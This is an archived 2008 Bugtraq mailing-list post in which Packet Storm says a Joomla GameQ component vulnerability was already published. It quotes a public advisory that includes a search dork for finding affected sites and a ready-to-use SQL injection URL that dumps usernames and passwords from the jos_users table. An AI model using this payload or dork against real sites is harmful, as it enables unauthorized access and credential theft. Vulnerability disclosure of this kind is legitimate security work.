lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
Message-ID: <20081204220805.GA11518@packetstormsecurity.org>
Date: Thu, 4 Dec 2008 17:08:05 -0500
From: packet@...ketstormsecurity.org
To: r3d.w0rm@...oo.com
Cc: bugtraq@...urityfocus.com
Subject: Re: Joomla Component GameQ

Already discovered:


http://packetstormsecurity.org/0806-exploits/joomlagameq-sql.txt 6d9a99abd76c7d48c68ea5c98d952844 The Joomla GameQ component versions 4.0 and below suffer from a SQL injection vulnerability.  Authored By <a href="mailto:His0k4.hlm[at]gmail.com">His0k4</a>


On Thu, Dec 04, 2008 at 08:20:16AM -0700, r3d.w0rm@...oo.com wrote:
> #####################################################################################
> ####                            Joomla Component GameQ                           ####
> #####################################################################################
> #                                                                                   #
> #AUTHOR : Sina Yazdanmehr (R3d.W0rm)                                                #
> #Discovered by : Sina Yazdanmehr (R3d.W0rm)                                         #
> #Our Site : Http://IRCRASH.COM                                                      #
> #IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi       #
> #####################################################################################
> #                                                                                   #
> #Download : http://joomlacode.org/gf/project/gameq                                  #
> #                                                                                   #
> #DORK : inurl:option=com_gameq                                                      #
> #                                                                                   #
> #####################################################################################
> #                                       [Bug]                                       #
> #                                                                                   #
> #http://Site/[path]/index.php?option=com_gameq&task=page&category_id=-9999+union+select+0,1,2,3,4,5,username,password,8,9,10,11,12,13+from+jos_users/*
> #                                                                                   #
> #####################################################################################
> #                           Site : Http://IRCRASH.COM                               #
> ###################################### TNX GOD ######################################

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ